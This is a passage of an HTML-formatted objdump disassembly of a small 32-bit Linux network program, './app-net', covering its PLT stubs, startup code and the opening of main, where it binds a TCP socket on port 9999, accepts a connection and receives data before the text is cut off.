class="code-line"span class="normal"489/span/span span class="code-line"span class="normal"490/span/span span class="code-line"span class="normal"491/span/span span class="code-line"span class="normal"492/span/span span class="code-line"span class="normal"493/span/span span class="code-line"span class="normal"494/span/span span class="code-line"span class="normal"495/span/span span class="code-line"span class="normal"496/span/span span class="code-line"span class="normal"497/span/span span class="code-line"span class="normal"498/span/span span class="code-line"span class="normal"499/span/span span class="code-line"span class="normal"500/span/span span class="code-line"span class="normal"501/span/span span class="code-line"span class="normal"502/span/span span class="code-line"span class="normal"503/span/span span class="code-line"span class="normal"504/span/span span class="code-line"span class="normal"505/span/span span class="code-line"span class="normal"506/span/span span class="code-line"span class="normal"507/span/span span class="code-line"span class="normal"508/span/span span class="code-line"span class="normal"509/span/span span class="code-line"span class="normal"510/span/span span class="code-line"span class="normal"511/span/span span class="code-line"span class="normal"512/span/span span class="code-line"span class="normal"513/span/span span class="code-line"span class="normal"514/span/span span class="code-line"span class="normal"515/span/span span class="code-line"span class="normal"516/span/span span class="code-line"span class="normal"517/span/span span class="code-line"span class="normal"518/span/span span class="code-line"span class="normal"519/span/span span class="code-line"span class="normal"520/span/span span class="code-line"span class="normal"521/span/span span class="code-line"span class="normal"522/span/span span class="code-line"span class="normal"523/span/span span class="code-line"span class="normal"524/span/span span class="code-line"span class="normal"525/span/span span class="code-line"span class="normal"526/span/span span class="code-line"span class="normal"527/span/span span class="code-line"span class="normal"528/span/span span class="code-line"span class="normal"529/span/span span class="code-line"span class="normal"530/span/span span class="code-line"span class="normal"531/span/span span class="code-line"span class="normal"532/span/span span class="code-line"span class="normal"533/span/span span class="code-line"span class="normal"534/span/span span class="code-line"span class="normal"535/span/span span class="code-line"span class="normal"536/span/span span class="code-line"span class="normal"537/span/span span class="code-line"span class="normal"538/span/span span class="code-line"span class="normal"539/span/span span class="code-line"span class="normal"540/span/span span class="code-line"span class="normal"541/span/span span class="code-line"span class="normal"542/span/span span class="code-line"span class="normal"543/span/span span class="code-line"span class="normal"544/span/span span class="code-line"span class="normal"545/span/span span class="code-line"span class="normal"546/span/span span class="code-line"span class="normal"547/span/span span class="code-line"span class="normal"548/span/span span class="code-line"span class="normal"549/span/span span class="code-line"span class="normal"550/span/span span class="code-line"span class="normal"551/span/span span class="code-line"span class="normal"552/span/span span class="code-line"span class="normal"553/span/span span class="code-line"span class="normal"554/span/span span class="code-line"span class="normal"555/span/span span class="code-line"span class="normal"556/span/span span class="code-line"span class="normal"557/span/span span class="code-line"span class="normal"558/span/span span class="code-line"span class="normal"559/span/span span class="code-line"span class="normal"560/span/span span class="code-line"span class="normal"561/span/span span class="code-line"span class="normal"562/span/span span class="code-line"span class="normal"563/span/span span class="code-line"span class="normal"564/span/span span class="code-line"span class="normal"565/span/span span class="code-line"span class="normal"566/span/span span class="code-line"span class="normal"567/span/span span class="code-line"span class="normal"568/span/span span class="code-line"span class="normal"569/span/span span class="code-line"span class="normal"570/span/span span class="code-line"span class="normal"571/span/span span class="code-line"span class="normal"572/span/span span class="code-line"span class="normal"573/span/span span class="code-line"span class="normal"574/span/span span class="code-line"span class="normal"575/span/span span class="code-line"span class="normal"576/span/span span class="code-line"span class="normal"577/span/span span class="code-line"span class="normal"578/span/span span class="code-line"span class="normal"579/span/span span class="code-line"span class="normal"580/span/span span class="code-line"span class="normal"581/span/span span class="code-line"span class="normal"582/span/span span class="code-line"span class="normal"583/span/span span class="code-line"span class="normal"584/span/span span class="code-line"span class="normal"585/span/span span class="code-line"span class="normal"586/span/span span class="code-line"span class="normal"587/span/span span class="code-line"span class="normal"588/span/span span class="code-line"span class="normal"589/span/span span class="code-line"span class="normal"590/span/span span class="code-line"span class="normal"591/span/span span class="code-line"span class="normal"592/span/span span class="code-line"span class="normal"593/span/span span class="code-line"span class="normal"594/span/span span class="code-line"span class="normal"595/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="nl"./app-net/spanspan class="p":/span file format span class="s"elf32-i386/span/span span class="code-line"/span span class="code-line"/span span class="code-line"Disassembly of section span class="nl".init/spanspan class="p":/span/span span class="code-line"/span span class="code-line"span class="mh"080485e0/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"_init/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80485e0: 55 push ebp/span/span span class="code-line"span class="x" 80485e1: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 80485e3: 53 push ebx/span/span span class="code-line"span class="x" 80485e4: 83 ec 04 sub esp,0x4/span/span span class="code-line"span class="x" 80485e7: e8 00 00 00 00 call 80485ec lt;_init+0xcgt;/span/span span class="code-line"span class="x" 80485ec: 5b pop ebx/span/span span class="code-line"span class="x" 80485ed: 81 c3 14 0b 00 00 add ebx,0xb14/span/span span class="code-line"span class="x" 80485f3: 8b 93 fc ff ff ff mov edx,DWORD PTR [ebx-0x4]/span/span span class="code-line"span class="x" 80485f9: 85 d2 test edx,edx/span/span span class="code-line"span class="x" 80485fb: 74 05 je 8048602 lt;_init+0x22gt;/span/span span class="code-line"span class="x" 80485fd: e8 ae 00 00 00 call 80486b0 lt;__gmon_start__@pltgt;/span/span span class="code-line"span class="x" 8048602: 58 pop eax/span/span span class="code-line"span class="x" 8048603: 5b pop ebx/span/span span class="code-line"span class="x" 8048604: c9 leave /span/span span class="code-line"span class="x" 8048605: c3 ret /span/span span class="code-line"/span span class="code-line"Disassembly of section span class="nl".plt/spanspan class="p":/span/span span class="code-line"/span span class="code-line"span class="mh"08048610/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"strcmp@plt/spanspan class="p"-/spanspan class="mh"0x10/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048610: ff 35 04 91 04 08 push DWORD PTR ds:0x8049104/span/span span class="code-line"span class="x" 8048616: ff 25 08 91 04 08 jmp DWORD PTR ds:0x8049108/span/span span class="code-line"span class="x" 804861c: 00 00 add BYTE PTR [eax],al/span/span span class="code-line"span class="x" .../span/span span class="code-line"/span span class="code-line"span class="mh"08048620/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"strcmp@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048620: ff 25 0c 91 04 08 jmp DWORD PTR ds:0x804910c/span/span span class="code-line"span class="x" 8048626: 68 00 00 00 00 push 0x0/span/span span class="code-line"span class="x" 804862b: e9 e0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048630/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"printf@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048630: ff 25 10 91 04 08 jmp DWORD PTR ds:0x8049110/span/span span class="code-line"span class="x" 8048636: 68 08 00 00 00 push 0x8/span/span span class="code-line"span class="x" 804863b: e9 d0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048640/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"bzero@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048640: ff 25 14 91 04 08 jmp DWORD PTR ds:0x8049114/span/span span class="code-line"span class="x" 8048646: 68 10 00 00 00 push 0x10/span/span span class="code-line"span class="x" 804864b: e9 c0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048650/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"fclose@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048650: ff 25 18 91 04 08 jmp DWORD PTR ds:0x8049118/span/span span class="code-line"span class="x" 8048656: 68 18 00 00 00 push 0x18/span/span span class="code-line"span class="x" 804865b: e9 b0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048660/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"recvfrom@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048660: ff 25 1c 91 04 08 jmp DWORD PTR ds:0x804911c/span/span span class="code-line"span class="x" 8048666: 68 20 00 00 00 push 0x20/span/span span class="code-line"span class="x" 804866b: e9 a0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048670/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"_IO_getc@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048670: ff 25 20 91 04 08 jmp DWORD PTR ds:0x8049120/span/span span class="code-line"span class="x" 8048676: 68 28 00 00 00 push 0x28/span/span span class="code-line"span class="x" 804867b: e9 90 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048680/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"htons@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048680: ff 25 24 91 04 08 jmp DWORD PTR ds:0x8049124/span/span span class="code-line"span class="x" 8048686: 68 30 00 00 00 push 0x30/span/span span class="code-line"span class="x" 804868b: e9 80 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048690/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"accept@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048690: ff 25 28 91 04 08 jmp DWORD PTR ds:0x8049128/span/span span class="code-line"span class="x" 8048696: 68 38 00 00 00 push 0x38/span/span span class="code-line"span class="x" 804869b: e9 70 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486a0/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"puts@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486a0: ff 25 2c 91 04 08 jmp DWORD PTR ds:0x804912c/span/span span class="code-line"span class="x" 80486a6: 68 40 00 00 00 push 0x40/span/span span class="code-line"span class="x" 80486ab: e9 60 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486b0/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__gmon_start__@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486b0: ff 25 30 91 04 08 jmp DWORD PTR ds:0x8049130/span/span span class="code-line"span class="x" 80486b6: 68 48 00 00 00 push 0x48/span/span span class="code-line"span class="x" 80486bb: e9 50 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486c0/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"exit@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486c0: ff 25 34 91 04 08 jmp DWORD PTR ds:0x8049134/span/span span class="code-line"span class="x" 80486c6: 68 50 00 00 00 push 0x50/span/span span class="code-line"span class="x" 80486cb: e9 40 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486d0/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"strlen@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486d0: ff 25 38 91 04 08 jmp DWORD PTR ds:0x8049138/span/span span class="code-line"span class="x" 80486d6: 68 58 00 00 00 push 0x58/span/span span class="code-line"span class="x" 80486db: e9 30 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486e0/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__libc_start_main@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486e0: ff 25 3c 91 04 08 jmp DWORD PTR ds:0x804913c/span/span span class="code-line"span class="x" 80486e6: 68 60 00 00 00 push 0x60/span/span span class="code-line"span class="x" 80486eb: e9 20 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"080486f0/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"bind@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80486f0: ff 25 40 91 04 08 jmp DWORD PTR ds:0x8049140/span/span span class="code-line"span class="x" 80486f6: 68 68 00 00 00 push 0x68/span/span span class="code-line"span class="x" 80486fb: e9 10 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048700/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"fopen@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048700: ff 25 44 91 04 08 jmp DWORD PTR ds:0x8049144/span/span span class="code-line"span class="x" 8048706: 68 70 00 00 00 push 0x70/span/span span class="code-line"span class="x" 804870b: e9 00 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048710/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"strncpy@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048710: ff 25 48 91 04 08 jmp DWORD PTR ds:0x8049148/span/span span class="code-line"span class="x" 8048716: 68 78 00 00 00 push 0x78/span/span span class="code-line"span class="x" 804871b: e9 f0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048720/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"sendto@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048720: ff 25 4c 91 04 08 jmp DWORD PTR ds:0x804914c/span/span span class="code-line"span class="x" 8048726: 68 80 00 00 00 push 0x80/span/span span class="code-line"span class="x" 804872b: e9 e0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048730/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"htonl@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048730: ff 25 50 91 04 08 jmp DWORD PTR ds:0x8049150/span/span span class="code-line"span class="x" 8048736: 68 88 00 00 00 push 0x88/span/span span class="code-line"span class="x" 804873b: e9 d0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048740/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"listen@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048740: ff 25 54 91 04 08 jmp DWORD PTR ds:0x8049154/span/span span class="code-line"span class="x" 8048746: 68 90 00 00 00 push 0x90/span/span span class="code-line"span class="x" 804874b: e9 c0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048750/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"atoi@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048750: ff 25 58 91 04 08 jmp DWORD PTR ds:0x8049158/span/span span class="code-line"span class="x" 8048756: 68 98 00 00 00 push 0x98/span/span span class="code-line"span class="x" 804875b: e9 b0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048760/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"socket@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048760: ff 25 5c 91 04 08 jmp DWORD PTR ds:0x804915c/span/span span class="code-line"span class="x" 8048766: 68 a0 00 00 00 push 0xa0/span/span span class="code-line"span class="x" 804876b: e9 a0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048770/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"close@plt/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048770: ff 25 60 91 04 08 jmp DWORD PTR ds:0x8049160/span/span span class="code-line"span class="x" 8048776: 68 a8 00 00 00 push 0xa8/span/span span class="code-line"span class="x" 804877b: e9 90 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"/span span class="code-line"Disassembly of section span class="nl".text/spanspan class="p":/span/span span class="code-line"/span span class="code-line"span class="mh"08048780/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"_start/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048780: 31 ed xor ebp,ebp/span/span span class="code-line"span class="x" 8048782: 5e pop esi/span/span span class="code-line"span class="x" 8048783: 89 e1 mov ecx,esp/span/span span class="code-line"span class="x" 8048785: 83 e4 f0 and esp,0xfffffff0/span/span span class="code-line"span class="x" 8048788: 50 push eax/span/span span class="code-line"span class="x" 8048789: 54 push esp/span/span span class="code-line"span class="x" 804878a: 52 push edx/span/span span class="code-line"span class="x" 804878b: 68 00 8d 04 08 push 0x8048d00/span/span span class="code-line"span class="x" 8048790: 68 10 8d 04 08 push 0x8048d10/span/span span class="code-line"span class="x" 8048795: 51 push ecx/span/span span class="code-line"span class="x" 8048796: 56 push esi/span/span span class="code-line"span class="x" 8048797: 68 6c 88 04 08 push 0x804886c/span/span span class="code-line"span class="x" 804879c: e8 3f ff ff ff call 80486e0 lt;__libc_start_main@pltgt;/span/span span class="code-line"span class="x" 80487a1: f4 hlt /span/span span class="code-line"span class="x" 80487a2: 90 nop/span/span span class="code-line"span class="x" 80487a3: 90 nop/span/span span class="code-line"span class="x" 80487a4: 90 nop/span/span span class="code-line"span class="x" 80487a5: 90 nop/span/span span class="code-line"span class="x" 80487a6: 90 nop/span/span span class="code-line"span class="x" 80487a7: 90 nop/span/span span class="code-line"span class="x" 80487a8: 90 nop/span/span span class="code-line"span class="x" 80487a9: 90 nop/span/span span class="code-line"span class="x" 80487aa: 90 nop/span/span span class="code-line"span class="x" 80487ab: 90 nop/span/span span class="code-line"span class="x" 80487ac: 90 nop/span/span span class="code-line"span class="x" 80487ad: 90 nop/span/span span class="code-line"span class="x" 80487ae: 90 nop/span/span span class="code-line"span class="x" 80487af: 90 nop/span/span span class="code-line"/span span class="code-line"span class="mh"080487b0/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"deregister_tm_clones/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80487b0: b8 6f 91 04 08 mov eax,0x804916f/span/span span class="code-line"span class="x" 80487b5: 2d 6c 91 04 08 sub eax,0x804916c/span/span span class="code-line"span class="x" 80487ba: 83 f8 06 cmp eax,0x6/span/span span class="code-line"span class="x" 80487bd: 77 02 ja 80487c1 lt;deregister_tm_clones+0x11gt;/span/span span class="code-line"span class="x" 80487bf: f3 c3 repz ret /span/span span class="code-line"span class="x" 80487c1: b8 00 00 00 00 mov eax,0x0/span/span span class="code-line"span class="x" 80487c6: 85 c0 test eax,eax/span/span span class="code-line"span class="x" 80487c8: 74 f5 je 80487bf lt;deregister_tm_clones+0xfgt;/span/span span class="code-line"span class="x" 80487ca: 55 push ebp/span/span span class="code-line"span class="x" 80487cb: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 80487cd: 83 ec 18 sub esp,0x18/span/span span class="code-line"span class="x" 80487d0: c7 04 24 6c 91 04 08 mov DWORD PTR [esp],0x804916c/span/span span class="code-line"span class="x" 80487d7: ff d0 call eax/span/span span class="code-line"span class="x" 80487d9: c9 leave /span/span span class="code-line"span class="x" 80487da: c3 ret /span/span span class="code-line"span class="x" 80487db: 90 nop/span/span span class="code-line"span class="x" 80487dc: 8d 74 26 00 lea esi,[esi+eiz*1+0x0]/span/span span class="code-line"/span span class="code-line"span class="mh"080487e0/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"register_tm_clones/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80487e0: b8 6c 91 04 08 mov eax,0x804916c/span/span span class="code-line"span class="x" 80487e5: 2d 6c 91 04 08 sub eax,0x804916c/span/span span class="code-line"span class="x" 80487ea: c1 f8 02 sar eax,0x2/span/span span class="code-line"span class="x" 80487ed: 89 c2 mov edx,eax/span/span span class="code-line"span class="x" 80487ef: c1 ea 1f shr edx,0x1f/span/span span class="code-line"span class="x" 80487f2: 01 d0 add eax,edx/span/span span class="code-line"span class="x" 80487f4: d1 f8 sar eax,1/span/span span class="code-line"span class="x" 80487f6: 75 02 jne 80487fa lt;register_tm_clones+0x1agt;/span/span span class="code-line"span class="x" 80487f8: f3 c3 repz ret /span/span span class="code-line"span class="x" 80487fa: ba 00 00 00 00 mov edx,0x0/span/span span class="code-line"span class="x" 80487ff: 85 d2 test edx,edx/span/span span class="code-line"span class="x" 8048801: 74 f5 je 80487f8 lt;register_tm_clones+0x18gt;/span/span span class="code-line"span class="x" 8048803: 55 push ebp/span/span span class="code-line"span class="x" 8048804: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048806: 83 ec 18 sub esp,0x18/span/span span class="code-line"span class="x" 8048809: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 804880d: c7 04 24 6c 91 04 08 mov DWORD PTR [esp],0x804916c/span/span span class="code-line"span class="x" 8048814: ff d2 call edx/span/span span class="code-line"span class="x" 8048816: c9 leave /span/span span class="code-line"span class="x" 8048817: c3 ret /span/span span class="code-line"span class="x" 8048818: 90 nop/span/span span class="code-line"span class="x" 8048819: 8d b4 26 00 00 00 00 lea esi,[esi+eiz*1+0x0]/span/span span class="code-line"/span span class="code-line"span class="mh"08048820/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__do_global_dtors_aux/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048820: 80 3d 6c 91 04 08 00 cmp BYTE PTR ds:0x804916c,0x0/span/span span class="code-line"span class="x" 8048827: 75 13 jne 804883c lt;__do_global_dtors_aux+0x1cgt;/span/span span class="code-line"span class="x" 8048829: 55 push ebp/span/span span class="code-line"span class="x" 804882a: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 804882c: 83 ec 08 sub esp,0x8/span/span span class="code-line"span class="x" 804882f: e8 7c ff ff ff call 80487b0 lt;deregister_tm_clonesgt;/span/span span class="code-line"span class="x" 8048834: c6 05 6c 91 04 08 01 mov BYTE PTR ds:0x804916c,0x1/span/span span class="code-line"span class="x" 804883b: c9 leave /span/span span class="code-line"span class="x" 804883c: f3 c3 repz ret /span/span span class="code-line"span class="x" 804883e: 66 90 xchg ax,ax/span/span span class="code-line"/span span class="code-line"span class="mh"08048840/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"frame_dummy/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048840: a1 08 90 04 08 mov eax,ds:0x8049008/span/span span class="code-line"span class="x" 8048845: 85 c0 test eax,eax/span/span span class="code-line"span class="x" 8048847: 74 1e je 8048867 lt;frame_dummy+0x27gt;/span/span span class="code-line"span class="x" 8048849: b8 00 00 00 00 mov eax,0x0/span/span span class="code-line"span class="x" 804884e: 85 c0 test eax,eax/span/span span class="code-line"span class="x" 8048850: 74 15 je 8048867 lt;frame_dummy+0x27gt;/span/span span class="code-line"span class="x" 8048852: 55 push ebp/span/span span class="code-line"span class="x" 8048853: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048855: 83 ec 18 sub esp,0x18/span/span span class="code-line"span class="x" 8048858: c7 04 24 08 90 04 08 mov DWORD PTR [esp],0x8049008/span/span span class="code-line"span class="x" 804885f: ff d0 call eax/span/span span class="code-line"span class="x" 8048861: c9 leave /span/span span class="code-line"span class="x" 8048862: e9 79 ff ff ff jmp 80487e0 lt;register_tm_clonesgt;/span/span span class="code-line"span class="x" 8048867: e9 74 ff ff ff jmp 80487e0 lt;register_tm_clonesgt;/span/span span class="code-line"/span span class="code-line"span class="mh"0804886c/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"main/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 804886c: 55 push ebp/span/span span class="code-line"span class="x" 804886d: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 804886f: 83 e4 f0 and esp,0xfffffff0/span/span span class="code-line"span class="x" 8048872: 81 ec 40 04 00 00 sub esp,0x440/span/span span class="code-line"span class="x" 8048878: c7 44 24 08 00 00 00 mov DWORD PTR [esp+0x8],0x0/span/span span class="code-line"span class="x" 804887f: 00 /span/span span class="code-line"span class="x" 8048880: c7 44 24 04 01 00 00 mov DWORD PTR [esp+0x4],0x1/span/span span class="code-line"span class="x" 8048887: 00 /span/span span class="code-line"span class="x" 8048888: c7 04 24 02 00 00 00 mov DWORD PTR [esp],0x2/span/span span class="code-line"span class="x" 804888f: e8 cc fe ff ff call 8048760 lt;socket@pltgt;/span/span span class="code-line"span class="x" 8048894: 89 84 24 3c 04 00 00 mov DWORD PTR [esp+0x43c],eax/span/span span class="code-line"span class="x" 804889b: c7 44 24 04 10 00 00 mov DWORD PTR [esp+0x4],0x10/span/span span class="code-line"span class="x" 80488a2: 00 /span/span span class="code-line"span class="x" 80488a3: 8d 84 24 20 04 00 00 lea eax,[esp+0x420]/span/span span class="code-line"span class="x" 80488aa: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 80488ad: e8 8e fd ff ff call 8048640 lt;bzero@pltgt;/span/span span class="code-line"span class="x" 80488b2: 66 c7 84 24 20 04 00 mov WORD PTR [esp+0x420],0x2/span/span span class="code-line"span class="x" 80488b9: 00 02 00 /span/span span class="code-line"span class="x" 80488bc: c7 04 24 00 00 00 00 mov DWORD PTR [esp],0x0/span/span span class="code-line"span class="x" 80488c3: e8 68 fe ff ff call 8048730 lt;htonl@pltgt;/span/span span class="code-line"span class="x" 80488c8: 89 84 24 24 04 00 00 mov DWORD PTR [esp+0x424],eax/span/span span class="code-line"span class="x" 80488cf: c7 04 24 0f 27 00 00 mov DWORD PTR [esp],0x270f/span/span span class="code-line"span class="x" 80488d6: e8 a5 fd ff ff call 8048680 lt;htons@pltgt;/span/span span class="code-line"span class="x" 80488db: 66 89 84 24 22 04 00 mov WORD PTR [esp+0x422],ax/span/span span class="code-line"span class="x" 80488e2: 00 /span/span span class="code-line"span class="x" 80488e3: c7 44 24 08 10 00 00 mov DWORD PTR [esp+0x8],0x10/span/span span class="code-line"span class="x" 80488ea: 00 /span/span span class="code-line"span class="x" 80488eb: 8d 84 24 20 04 00 00 lea eax,[esp+0x420]/span/span span class="code-line"span class="x" 80488f2: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 80488f6: 8b 84 24 3c 04 00 00 mov eax,DWORD PTR [esp+0x43c]/span/span span class="code-line"span class="x" 80488fd: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048900: e8 eb fd ff ff call 80486f0 lt;bind@pltgt;/span/span span class="code-line"span class="x" 8048905: 89 84 24 38 04 00 00 mov DWORD PTR [esp+0x438],eax/span/span span class="code-line"span class="x" 804890c: 83 bc 24 38 04 00 00 cmp DWORD PTR [esp+0x438],0x0/span/span span class="code-line"span class="x" 8048913: 00 /span/span span class="code-line"span class="x" 8048914: 74 20 je 8048936 lt;main+0xcagt;/span/span span class="code-line"span class="x" 8048916: c7 44 24 04 0f 27 00 mov DWORD PTR [esp+0x4],0x270f/span/span span class="code-line"span class="x" 804891d: 00 /span/span span class="code-line"span class="x" 804891e: c7 04 24 90 8d 04 08 mov DWORD PTR [esp],0x8048d90/span/span span class="code-line"span class="x" 8048925: e8 06 fd ff ff call 8048630 lt;printf@pltgt;/span/span span class="code-line"span class="x" 804892a: c7 04 24 01 00 00 00 mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="x" 8048931: e8 8a fd ff ff call 80486c0 lt;exit@pltgt;/span/span span class="code-line"span class="x" 8048936: c7 44 24 04 00 04 00 mov DWORD PTR [esp+0x4],0x400/span/span span class="code-line"span class="x" 804893d: 00 /span/span span class="code-line"span class="x" 804893e: 8b 84 24 3c 04 00 00 mov eax,DWORD PTR [esp+0x43c]/span/span span class="code-line"span class="x" 8048945: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048948: e8 f3 fd ff ff call 8048740 lt;listen@pltgt;/span/span span class="code-line"span class="x" 804894d: c7 84 24 0c 04 00 00 mov DWORD PTR [esp+0x40c],0x10/span/span span class="code-line"span class="x" 8048954: 10 00 00 00 /span/span span class="code-line"span class="x" 8048958: 8d 84 24 0c 04 00 00 lea eax,[esp+0x40c]/span/span span class="code-line"span class="x" 804895f: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048963: 8d 84 24 10 04 00 00 lea eax,[esp+0x410]/span/span span class="code-line"span class="x" 804896a: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 804896e: 8b 84 24 3c 04 00 00 mov eax,DWORD PTR [esp+0x43c]/span/span span class="code-line"span class="x" 8048975: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048978: e8 13 fd ff ff call 8048690 lt;accept@pltgt;/span/span span class="code-line"span class="x" 804897d: 89 84 24 34 04 00 00 mov DWORD PTR [esp+0x434],eax/span/span span class="code-line"span class="x" 8048984: 8d 84 24 0c 04 00 00 lea eax,[esp+0x40c]/span/span span class="code-line"span class="x" 804898b: 89 44 24 14 mov DWORD PTR [esp+0x14],eax/span/span span class="code-line"span class="x" 804898f: 8d 84 24 10 04 00 00 lea eax,[esp+0x410]/span/span span class="code-line"span class="x" 8048996: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 804899a: c7 44 24 0c 00 00 00 mov DWORD PTR [esp+0xc],0x0/span/span span class="code-line"span class="x" 80489a1: 00 /span/span span class="code-line"span class="x" 80489a2: c7 44 24 08 e8 03 00 mov DWORD PTR [esp+0x8],0x3e8/span/span span class="code-line"span class="x" 80489a9: 00 /span/span span class="code-line"span class="x" 80489aa: 8d 44 24 24 lea eax,[esp+0x24]/span/span span class="code-line"span class="x" 80489ae: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 80489b2: 8b 84 24 34 04 00 00 mov eax,DWORD PTR [esp+0x434]/span/span span class="code-line"span class="x" 80489b9: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 80489bc: e8 9f fc ff ff call 